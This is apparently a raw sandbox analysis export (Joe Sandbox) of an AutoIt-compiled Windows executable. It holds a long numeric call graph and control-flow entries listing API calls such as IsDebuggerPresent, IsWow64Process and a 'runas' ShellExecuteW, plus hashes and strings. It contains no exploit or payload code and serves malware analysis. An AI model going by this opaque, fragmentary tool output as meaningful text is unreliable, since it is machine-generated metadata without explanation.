104096 955744 104095->104096 104097 955759 104095->104097 104110 94f636 20 API calls __dosmaperr 104096->104110 104102 95577e 104097->104102 104112 94f636 20 API calls __dosmaperr 104097->104112 104099 955749 104111 94f649 20 API calls __dosmaperr 104099->104111 104102->104034 104103 955789 104113 94f649 20 API calls __dosmaperr 104103->104113 104104 955751 104104->104034 104106 955791 104114 952b5c 26 API calls pre_c_initialization 104106->104114 104108->104039 104109->104042 104110->104099 104111->104104 104112->104103 104113->104106 104114->104104 104606 92f5e5 104607 92cab0 207 API calls 104606->104607 104608 92f5f3 104607->104608 104115 97400f 104131 92eeb0 ISource 104115->104131 104116 92f211 PeekMessageW 104116->104131 104117 92ef07 GetInputState 104117->104116 104117->104131 104118 92f0d5 104120 9732cd TranslateAcceleratorW 104120->104131 104121 92f104 timeGetTime 104121->104131 104122 92f273 TranslateMessage DispatchMessageW 104123 92f28f PeekMessageW 104122->104123 104123->104131 104124 92f2af Sleep 104145 92f2c0 104124->104145 104125 974183 Sleep 104125->104145 104126 93f215 timeGetTime 104126->104145 104127 9733e9 timeGetTime 104182 93aa65 9 API calls 104127->104182 104129 98dd87 46 API calls 104129->104145 104130 97421a GetExitCodeProcess 104132 974246 CloseHandle 104130->104132 104133 974230 WaitForSingleObject 104130->104133 104131->104116 104131->104117 104131->104118 104131->104120 104131->104121 104131->104122 104131->104123 104131->104124 104131->104125 104131->104127 104143 930340 207 API calls 104131->104143 104144 932b20 207 API calls 104131->104144 104147 92f450 104131->104147 104154 92f6d0 104131->104154 104177 93e915 104131->104177 104183 99446f 8 API calls 104131->104183 104184 993fe1 81 API calls __wsopen_s 104131->104184 104132->104145 104133->104131 104133->104132 104135 973d51 104137 973d59 104135->104137 104136 9b345b GetForegroundWindow 104136->104145 104138 9742b8 Sleep 104138->104131 104143->104131 104144->104131 104145->104126 104145->104129 104145->104130 104145->104131 104145->104135 104145->104136 104145->104138 104185 9a60b5 8 API calls 104145->104185 104186 98f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104145->104186 104148 92f483 104147->104148 104149 92f46f 104147->104149 104219 993fe1 81 API calls __wsopen_s 104148->104219 104187 92e960 104149->104187 104152 92f47a 104152->104131 104153 974584 104153->104153 104156 92f710 104154->104156 104155 930340 207 API calls 104172 92f7dc ISource 104155->104172 104156->104172 104236 9405b2 5 API calls __Init_thread_wait 104156->104236 104159 9745d9 104161 92bf73 8 API calls 104159->104161 104159->104172 104160 92bf73 8 API calls 104160->104172 104163 9745f3 104161->104163 104237 940413 29 API calls __onexit 104163->104237 104164 92be2d 39 API calls 104164->104172 104166 9745fd 104238 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104166->104238 104170 993fe1 81 API calls 104170->104172 104171 92bed9 8 API calls 104171->104172 104172->104155 104172->104160 104172->104164 104172->104170 104172->104171 104173 92fae1 104172->104173 104174 931ca0 8 API calls 104172->104174 104235 93b35c 207 API calls 104172->104235 104239 9405b2 5 API calls __Init_thread_wait 104172->104239 104240 940413 29 API calls __onexit 104172->104240 104241 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104172->104241 104242 9a5231 101 API calls 104172->104242 104243 9a731e 207 API calls 104172->104243 104173->104131 104174->104172 104178 93e959 104177->104178 104179 93e928 104177->104179 104178->104131 104179->104178 104180 93e94c IsDialogMessageW 104179->104180 104181 97eff6 GetClassLongW 104179->104181 104180->104178 104180->104179 104181->104179 104181->104180 104182->104131 104183->104131 104184->104131 104185->104145 104186->104145 104188 930340 207 API calls 104187->104188 104206 92e99d 104188->104206 104189 9731d3 104233 993fe1 81 API calls __wsopen_s 104189->104233 104191 92ea0b ISource 104191->104152 104192 92edd5 104192->104191 104202 94017b 8 API calls 104192->104202 104193 92eac3 104193->104192 104195 92eace 104193->104195 104194 92ecff 104196 9731c4 104194->104196 104197 92ed14 104194->104197 104199 94014b 8 API calls 104195->104199 104232 9a6162 8 API calls 104196->104232 104201 94014b 8 API calls 104197->104201 104198 92ebb8 104205 94017b 8 API calls 104198->104205 104204 92ead5 __fread_nolock 104199->104204 104212 92eb6a 104201->104212 104202->104204 104203 92eb29 ISource __fread_nolock 104203->104194 104211 9731b3 104203->104211 104203->104212 104215 97318e 104203->104215 104217 97316c 104203->104217 104228 9244fe 207 API calls 104203->104228 104207 94014b 8 API calls 104204->104207 104209 92eaf6 104204->104209 104205->104203 104206->104189 104206->104191 104206->104192 104206->104193 104206->104198 104206->104203 104208 94014b 8 API calls 104206->104208 104207->104209 104208->104206 104209->104203 104220 92d260 104209->104220 104231 993fe1 81 API calls __wsopen_s 104211->104231 104212->104152 104230 993fe1 81 API calls __wsopen_s 104215->104230 104229 993fe1 81 API calls __wsopen_s 104217->104229 104219->104153 104221 92d2c6 104220->104221 104222 92d29a 104220->104222 104224 930340 207 API calls 104221->104224 104223 92f6d0 207 API calls 104222->104223 104226 92d2a0 104222->104226 104223->104226 104225 97184b 104224->104225 104225->104226 104234 993fe1 81 API calls __wsopen_s 104225->104234 104226->104203 104228->104203 104229->104212 104230->104212 104231->104212 104232->104189 104233->104191 104234->104226 104235->104172 104236->104159 104237->104166 104238->104172 104239->104172 104240->104172 104241->104172 104242->104172 104243->104172 104609 9765af 104610 94014b 8 API calls 104609->104610 104611 9765b6 104610->104611 104615 98fafb 104611->104615 104613 9765c2 104614 98fafb 8 API calls 104613->104614 104614->104613 104616 98fb1b 104615->104616 104617 98fbe4 104616->104617 104618 94017b 8 API calls 104616->104618 104617->104613 104619 98fb57 104618->104619 104621 98fb79 104619->104621 104623 98fbed 8 API calls 104619->104623 104621->104617 104622 92bed9 8 API calls 104621->104622 104622->104621 104623->104619 104624 94f06e 104625 94f07a ___BuildCatchObject 104624->104625 104626 94f086 104625->104626 104627 94f09b 104625->104627 104643 94f649 20 API calls __dosmaperr 104626->104643 104637 9494fd EnterCriticalSection 104627->104637 104630 94f08b 104644 952b5c 26 API calls pre_c_initialization 104630->104644 104631 94f0a7 104638 94f0db 104631->104638 104636 94f096 __fread_nolock 104637->104631 104646 94f106 104638->104646 104640 94f0e8 104641 94f0b4 104640->104641 104666 94f649 20 API calls __dosmaperr 104640->104666 104645 94f0d1 LeaveCriticalSection __fread_nolock 104641->104645 104643->104630 104644->104636 104645->104636 104647 94f114 104646->104647 104648 94f12e 104646->104648 104670 94f649 20 API calls __dosmaperr 104647->104670 104649 94dcc5 __fread_nolock 26 API calls 104648->104649 104651 94f137 104649->104651 104667 959789 104651->104667 104652 94f119 104671 952b5c 26 API calls pre_c_initialization 104652->104671 104656 94f1bf 104660 94f1dc 104656->104660 104662 94f1ee 104656->104662 104657 94f23b 104658 94f248 104657->104658 104657->104662 104673 94f649 20 API calls __dosmaperr 104658->104673 104672 94f41f 31 API calls 4 library calls 104660->104672 104663 94f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104662->104663 104674 94f29b 30 API calls 2 library calls 104662->104674 104663->104640 104664 94f1e6 104664->104663 104666->104641 104675 959606 104667->104675 104669 94f153 104669->104656 104669->104657 104669->104663 104670->104652 104671->104663 104672->104664 104673->104663 104674->104663 104676 959612 ___BuildCatchObject 104675->104676 104677 95961a 104676->104677 104682 959632 104676->104682 104701 94f636 20 API calls __dosmaperr 104677->104701 104678 9596e6 104706 94f636 20 API calls __dosmaperr 104678->104706 104680 95961f 104702 94f649 20 API calls __dosmaperr 104680->104702 104682->104678 104685 95966a 104682->104685 104684 9596eb 104707 94f649 20 API calls __dosmaperr 104684->104707 104700 9554ba EnterCriticalSection 104685->104700 104688 9596f3 104708 952b5c 26 API calls pre_c_initialization 104688->104708 104689 959670 104691 959694 104689->104691 104692 9596a9 104689->104692 104703 94f649 20 API calls __dosmaperr 104691->104703 104695 95970b __wsopen_s 28 API calls 104692->104695 104694 959627 __fread_nolock 104694->104669 104696 9596a4 104695->104696 104705 9596de LeaveCriticalSection __wsopen_s 104696->104705 104697 959699 104704 94f636 20 API calls __dosmaperr 104697->104704 104700->104689 104701->104680 104702->104694 104703->104697 104704->104696 104705->104694 104706->104684 104707->104688 104708->104694 104709 94076b 104710 940777 ___BuildCatchObject 104709->104710 104739 940221 104710->104739 104712 94077e 104713 9408d1 104712->104713 104716 9407a8 104712->104716 104777 940baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104713->104777 104715 9408d8 104778 9451c2 28 API calls _abort 104715->104778 104727 9407e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104716->104727 104750 9527ed 104716->104750 104718 9408de 104779 945174 28 API calls _abort 104718->104779 104722 9408e6 104723 9407c7 104725 940848 104758 940cc9 104725->104758 104727->104725 104773 94518a 38 API calls 2 library calls 104727->104773 104728 94084e 104762 92331b 104728->104762 104733 94086a 104733->104715 104734 94086e 104733->104734 104735 940877 104734->104735 104775 945165 28 API calls _abort 104734->104775 104776 9403b0 13 API calls 2 library calls 104735->104776 104738 94087f 104738->104723 104740 94022a 104739->104740 104780 940a08 IsProcessorFeaturePresent 104740->104780 104742 940236 104781 943004 10 API calls 3 library calls 104742->104781 104744 94023b 104745 94023f 104744->104745 104782 952687 104744->104782 104745->104712 104748 940256 104748->104712 104751 952804 104750->104751 104752 940dfc CatchGuardHandler 5 API calls 104751->104752 104753 9407c1 104752->104753 104753->104723 104754 952791 104753->104754 104755 9527c0 104754->104755 104756 940dfc CatchGuardHandler 5 API calls 104755->104756 104757 9527e9 104756->104757 104757->104727 104833 9426b0 104758->104833 104760 940cdc GetStartupInfoW 104761 940cef 104760->104761 104761->104728 104763 923382 104762->104763 104764 923327 IsThemeActive 104762->104764 104774 940d02 GetModuleHandleW 104763->104774 104835 9452b3 104764->104835 104766 923352 104841 945319 104766->104841 104768 923359 104848 9232e6 SystemParametersInfoW SystemParametersInfoW 104768->104848 104770 923360 104849 92338b 104770->104849 104772 923368 SystemParametersInfoW 104772->104763 104773->104725 104774->104733 104775->104735 104776->104738 104777->104715 104778->104718 104779->104722 104780->104742 104781->104744 104786 95d576 104782->104786 104785 94302d 8 API calls 3 library calls 104785->104745 104787 95d593 104786->104787 104790 95d58f 104786->104790 104787->104790 104792 954f6e 104787->104792 104789 940248 104789->104748 104789->104785 104804 940dfc 104790->104804 104793 954f7a ___BuildCatchObject 104792->104793 104811 9532d1 EnterCriticalSection 104793->104811 104795 954f81 104812 955422 104795->104812 104797 954f90 104798 954f9f 104797->104798 104825 954e02 29 API calls 104797->104825 104827 954fbb LeaveCriticalSection _abort 104798->104827 104801 954f9a 104826 954eb8 GetStdHandle GetFileType 104801->104826 104803 954fb0 __fread_nolock 104803->104787 104805 940e05 104804->104805 104806 940e07 IsProcessorFeaturePresent 104804->104806 104805->104789 104808 940fce 104806->104808 104832 940f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104808->104832 104810 9410b1 104810->104789 104811->104795 104813 95542e ___BuildCatchObject 104812->104813 104814 955452 104813->104814 104815 95543b 104813->104815 104828 9532d1 EnterCriticalSection 104814->104828 104829 94f649 20 API calls __dosmaperr 104815->104829 104818 955440 104830 952b5c 26 API calls pre_c_initialization 104818->104830 104820 95544a __fread_nolock 104820->104797 104821 95548a 104831 9554b1 LeaveCriticalSection _abort 104821->104831 104822 95545e 104822->104821 104824 955373 __wsopen_s 21 API calls 104822->104824 104824->104822 104825->104801 104826->104798 104827->104803 104828->104822 104829->104818 104830->104820 104831->104820 104832->104810 104834 9426b4 104833->104834 104834->104760 104834->104834 104836 9452bf ___BuildCatchObject 104835->104836 104898 9532d1 EnterCriticalSection 104836->104898 104838 9452ca pre_c_initialization 104899 94530a 104838->104899 104840 9452ff __fread_nolock 104840->104766 104842 945325 104841->104842 104843 94533f 104841->104843 104842->104843 104903 94f649 20 API calls __dosmaperr 104842->104903 104843->104768 104845 94532f 104904 952b5c 26 API calls pre_c_initialization 104845->104904 104847 94533a 104847->104768 104848->104770 104850 92339b __wsopen_s 104849->104850 104851 92bf73 8 API calls 104850->104851 104852 9233a7 GetCurrentDirectoryW 104851->104852 104905 924fd9 104852->104905 104854 9233ce IsDebuggerPresent 104855 963ca3 MessageBoxA 104854->104855 104856 9233dc 104854->104856 104858 963cbb 104855->104858 104857 9233f0 104856->104857 104856->104858 104973 923a95 104857->104973 105009 924176 8 API calls 104858->105009 104862 923462 104867 963cec SetCurrentDirectoryW 104862->104867 104868 92346a 104862->104868 104867->104868 104869 923475 104868->104869 105010 981fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104868->105010 105005 9234d3 7 API calls 104869->105005 104872 963d07 104872->104869 104875 963d19 104872->104875 104877 925594 10 API calls 104875->104877 104876 92347f 104879 92396b 60 API calls 104876->104879 104882 923494 104876->104882 104878 963d22 104877->104878 104880 92b329 8 API calls 104878->104880 104879->104882 104881 963d30 104880->104881 104884 963d5f 104881->104884 104885 963d38 104881->104885 104883 9234af 104882->104883 104886 923907 Shell_NotifyIconW 104882->104886 104888 9234b6 SetCurrentDirectoryW 104883->104888 104887 926b7c 8 API calls 104884->104887 104889 926b7c 8 API calls 104885->104889 104886->104883 104890 963d5b GetForegroundWindow ShellExecuteW 104887->104890 104891 9234ca 104888->104891 104892 963d43 104889->104892 104895 963d90 104890->104895 104891->104772 104894 927bb5 8 API calls 104892->104894 104896 963d51 104894->104896 104895->104883 104897 926b7c 8 API calls 104896->104897 104897->104890 104898->104838 104902 953319 LeaveCriticalSection 104899->104902 104901 945311 104901->104840 104902->104901 104903->104845 104904->104847 104906 92bf73 8 API calls 104905->104906 104907 924fef 104906->104907 105011 9263d7 104907->105011 104909 92500d 104910 92bd57 8 API calls 104909->104910 104911 925021 104910->104911 104912 92bed9 8 API calls 104911->104912 104913 92502c 104912->104913 105025 92893c 104913->105025 104916 92b329 8 API calls 104917 925045 104916->104917 104918 92be2d 39 API calls 104917->104918 104919 925055 104918->104919 104920 92b329 8 API calls 104919->104920 104921 92507b 104920->104921 104922 92be2d 39 API calls 104921->104922 104923 92508a 104922->104923 104924 92bf73 8 API calls 104923->104924 104925 9250a8 104924->104925 105028 9251ca 104925->105028 104928 944d98 _strftime 40 API calls 104929 9250c2 104928->104929 104930 964b23 104929->104930 104931 9250cc 104929->104931 104933 9251ca 8 API calls 104930->104933 104932 944d98 _strftime 40 API calls 104931->104932 104934 9250d7 104932->104934 104935 964b37 104933->104935 104934->104935 104936 9250e1 104934->104936 104937 9251ca 8 API calls 104935->104937 104938 944d98 _strftime 40 API calls 104936->104938 104939 964b53 104937->104939 104940 9250ec 104938->104940 104942 925594 10 API calls 104939->104942 104940->104939 104941 9250f6 104940->104941 104943 944d98 _strftime 40 API calls 104941->104943 104944 964b76 104942->104944 104945 925101 104943->104945 104946 9251ca 8 API calls 104944->104946 104947 964b9f 104945->104947 104948 92510b 104945->104948 104949 964b82 104946->104949 104951 9251ca 8 API calls 104947->104951 104950 92512e 104948->104950 104955 92bed9 8 API calls 104948->104955 104954 92bed9 8 API calls 104949->104954 104953 964bda 104950->104953 104958 927e12 8 API calls 104950->104958 104952 964bbd 104951->104952 104957 92bed9 8 API calls 104952->104957 104959 964b90 104954->104959 104956 925121 104955->104956 104960 9251ca 8 API calls 104956->104960 104961 964bcb 104957->104961 104962 92513e 104958->104962 104963 9251ca 8 API calls 104959->104963 104960->104950 104964 9251ca 8 API calls 104961->104964 104965 928470 8 API calls 104962->104965 104963->104947 104964->104953 104966 92514c 104965->104966 105034 928a60 104966->105034 104968 92893c 8 API calls 104970 925167 104968->104970 104969 928a60 8 API calls 104969->104970 104970->104968 104970->104969 104971 9251ab 104970->104971 104972 9251ca 8 API calls 104970->104972 104971->104854 104972->104970 104974 923aa2 __wsopen_s 104973->104974 104975 923abb 104974->104975 104976 9640da ___scrt_fastfail 104974->104976 104977 925851 9 API calls 104975->104977 104979 9640f6 GetOpenFileNameW 104976->104979 104978 923ac4 104977->104978 105046 923a57 104978->105046 104981 964145 104979->104981 104983 928577 8 API calls 104981->104983 104985 96415a 104983->104985 104985->104985 104986 923ad9 105064 9262d5 104986->105064 105609 923624 7 API calls 105005->105609 105007 92347a 105008 9235b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105007->105008 105008->104876 105009->104862 105010->104872 105012 9263e4 __wsopen_s 105011->105012 105013 928577 8 API calls 105012->105013 105014 926416 105012->105014 105013->105014 105015 92655e 8 API calls 105014->105015 105018 92644c 105014->105018 105015->105014 105016 92651a 105017 92654f 105016->105017 105019 92b329 8 API calls 105016->105019 105017->104909 105018->105016 105021 92b329 8 API calls 105018->105021 105023 926a7c 8 API calls 105018->105023 105024 92655e 8 API calls 105018->105024 105020 926543 105019->105020 105022 926a7c 8 API calls 105020->105022 105021->105018 105022->105017 105023->105018 105024->105018 105026 94014b 8 API calls 105025->105026 105027 925038 105026->105027 105027->104916 105029 9251f2 105028->105029 105030 9251d4 105028->105030 105032 928577 8 API calls 105029->105032 105031 9250b4 105030->105031 105033 92bed9 8 API calls 105030->105033 105031->104928 105032->105031 105033->105031 105035 928a76 105034->105035 105036 966737 105035->105036 105042 928a80 105035->105042 105045 93b7a2 8 API calls 105036->105045 105037 966744 105039 92b4c8 8 API calls 105037->105039 105040 966762 105039->105040 105040->105040 105041 928b94 105043 94014b 8 API calls 105041->105043 105042->105037 105042->105041 105044 928b9b 105042->105044 105043->105044 105044->104970 105045->105037 105047 9622d0 __wsopen_s 105046->105047 105048 923a64 GetLongPathNameW 105047->105048 105049 928577 8 API calls 105048->105049 105050 923a8c 105049->105050 105051 9253f2 105050->105051 105052 92bf73 8 API calls 105051->105052 105053 925404 105052->105053 105054 925851 9 API calls 105053->105054 105055 92540f 105054->105055 105056 92541a 105055->105056 105060 964d5b 105055->105060 105057 926a7c 8 API calls 105056->105057 105059 925426 105057->105059 105094 921340 105059->105094 105062 964d7d 105060->105062 105100 93e36b 41 API calls 105060->105100 105063 925439 105063->104986 105101 926679 105064->105101 105095 921352 105094->105095 105099 921371 __fread_nolock 105094->105099 105097 94017b 8 API calls 105095->105097 105096 94014b 8 API calls 105098 921388 105096->105098 105097->105099 105098->105063 105099->105096 105100->105060 105280 92663e LoadLibraryA 105101->105280 105106 9266a4 LoadLibraryExW 105288 926607 LoadLibraryA 105106->105288 105107 965648 105108 9266e7 68 API calls 105107->105108 105110 96564f 105108->105110 105112 926607 3 API calls 105110->105112 105115 965657 105112->105115 105309 92684a 105115->105309 105281 926656 GetProcAddress 105280->105281 105282 926674 105280->105282 105283 926666 105281->105283 105285 94e95b 105282->105285 105283->105282 105284 92666d FreeLibrary 105283->105284 105284->105282 105317 94e89a 105285->105317 105287 926698 105287->105106 105287->105107 105289 92663b 105288->105289 105290 92661c GetProcAddress 105288->105290 105293 926720 105289->105293 105291 92662c 105290->105291 105291->105289 105292 926634 FreeLibrary 105291->105292 105292->105289 105294 94017b 8 API calls 105293->105294 105295 926735 105294->105295 105296 92423c 8 API calls 105295->105296 105310 965760 105309->105310 105311 92685c 105309->105311 105320 94e8a6 ___BuildCatchObject 105317->105320 105318 94e8b4 105342 94f649 20 API calls __dosmaperr 105318->105342 105320->105318 105322 94e8e4 105320->105322 105321 94e8b9 105343 952b5c 26 API calls pre_c_initialization 105321->105343 105324 94e8f6 105322->105324 105325 94e8e9 105322->105325 105334 9583e1 105324->105334 105344 94f649 20 API calls __dosmaperr 105325->105344 105328 94e8c4 __fread_nolock 105328->105287 105335 9583ed ___BuildCatchObject 105334->105335 105347 9532d1 EnterCriticalSection 105335->105347 105337 9583fb 105348 95847b 105337->105348 105342->105321 105343->105328 105344->105328 105347->105337 105349 95849e 105348->105349 105350 9584f7 105349->105350 105357 958408 105349->105357 105364 9494fd EnterCriticalSection 105349->105364 105365 949511 LeaveCriticalSection 105349->105365 105351 954ff0 _abort 20 API calls 105350->105351 105352 958500 105351->105352 105354 952d38 _free 20 API calls 105352->105354 105361 958437 105357->105361 105368 953319 LeaveCriticalSection 105361->105368 105363 95843e 105364->105349 105365->105349 105368->105363 105609->105007

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 234 925fc8-926037 call 92bf73 GetVersionExW call 928577 239 96507d-965090 234->239 240 92603d 234->240 241 965091-965095 239->241 242 92603f-926041 240->242 243 965097 241->243 244 965098-9650a4 241->244 245 926047-9260a6 call 92adf4 call 9255dc 242->245 246 9650bc 242->246 243->244 244->241 247 9650a6-9650a8 244->247 259 965224-96522b 245->259 260 9260ac-9260ae 245->260 250 9650c3-9650cf 246->250 247->242 249 9650ae-9650b5 247->249 249->239 252 9650b7 249->252 253 92611c-926136 GetCurrentProcess IsWow64Process 250->253 252->246 255 926195-92619b 253->255 256 926138 253->256 258 92613e-92614a 255->258 256->258 265 926150-92615f LoadLibraryA 258->265 266 965269-96526d GetSystemInfo 258->266 263 96522d 259->263 264 96524b-96524e 259->264 261 965125-965138 260->261 262 9260b4-9260b7 260->262 268 965161-965163 261->268 269 96513a-965143 261->269 262->253 270 9260b9-9260f5 262->270 267 965233 263->267 271 965250-96525f 264->271 272 965239-965241 264->272 273 926161-92616f GetProcAddress 265->273 274 92619d-9261a7 GetSystemInfo 265->274 267->272 279 965165-96517a 268->279 280 965198-96519b 268->280 276 965145-96514b 269->276 277 965150-96515c 269->277 270->253 278 9260f7-9260fa 270->278 271->267 281 965261-965267 271->281 272->264 273->274 282 926171-926175 GetNativeSystemInfo 273->282 275 926177-926179 274->275 289 926182-926194 275->289 290 92617b-92617c FreeLibrary 275->290 276->253 277->253 283 9650d4-9650e4 278->283 284 926100-92610a 278->284 285 965187-965193 279->285 286 96517c-965182 279->286 287 9651d6-9651d9 280->287 288 96519d-9651b8 280->288 281->272 282->275 294 9650e6-9650f2 283->294 295 9650f7-965101 283->295 284->250 291 926110-926116 284->291 285->253 286->253 287->253 296 9651df-965206 287->296 292 9651c5-9651d1 288->292 293 9651ba-9651c0 288->293 290->289 291->253 292->253 293->253 294->253 297 965114-965120 295->297 298 965103-96510f 295->298 299 965213-96521f 296->299 300 965208-96520e 296->300 297->253 298->253 299->253 300->253
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00925FF7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,009BDC2C,00000000,?,?), ref: 00926123
                                                                                                                                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 0092612A
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00926155
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00926167
                                                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00926175
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0092617C
                                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 009261A1
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                            • Opcode ID: 1e8aaae47ed2cbadb5f3452cda5fb0c2b59faeb803adc575d50578f60a76b893
                                                                                                                                                                                                                                                                                            • Instruction ID: f292c1605e85742f4b842f2010e973d284753b6ee93ba9f58eca6a087d7faa43
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e8aaae47ed2cbadb5f3452cda5fb0c2b59faeb803adc575d50578f60a76b893
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54A1B2B296E3D4CFC716DB687C413B53FE86B26B00B094899E48097226D2FD5548FB32

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00923368,?), ref: 009233BB
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00923368,?), ref: 009233CE
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,009F2418,009F2400,?,?,?,?,?,?,00923368,?), ref: 0092343A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00923462,009F2418,?,?,?,?,?,?,?,00923368,?), ref: 009242A0
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,009F2418,?,?,?,?,?,?,?,00923368,?), ref: 009234BB
                                                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00963CB0
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,009F2418,?,?,?,?,?,?,?,00923368,?), ref: 00963CF1
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009E31F4,009F2418,?,?,?,?,?,?,?,00923368), ref: 00963D7A
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00963D81
                                                                                                                                                                                                                                                                                              • Part of subcall function 009234D3: GetSysColorBrush.USER32(0000000F), ref: 009234DE
                                                                                                                                                                                                                                                                                              • Part of subcall function 009234D3: LoadCursorW.USER32(00000000,00007F00), ref: 009234ED
                                                                                                                                                                                                                                                                                              • Part of subcall function 009234D3: LoadIconW.USER32(00000063), ref: 00923503
                                                                                                                                                                                                                                                                                              • Part of subcall function 009234D3: LoadIconW.USER32(000000A4), ref: 00923515
                                                                                                                                                                                                                                                                                              • Part of subcall function 009234D3: LoadIconW.USER32(000000A2), ref: 00923527
                                                                                                                                                                                                                                                                                              • Part of subcall function 009234D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0092353F
                                                                                                                                                                                                                                                                                              • Part of subcall function 009234D3: RegisterClassExW.USER32(?), ref: 00923590
                                                                                                                                                                                                                                                                                              • Part of subcall function 009235B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009235E1
                                                                                                                                                                                                                                                                                              • Part of subcall function 009235B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00923602
                                                                                                                                                                                                                                                                                              • Part of subcall function 009235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00923368,?), ref: 00923616
                                                                                                                                                                                                                                                                                              • Part of subcall function 009235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00923368,?), ref: 0092361F
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00923A3C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • AutoIt, xrefs: 00963CA5
                                                                                                                                                                                                                                                                                            • runas, xrefs: 00963D75
                                                                                                                                                                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00963CAA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
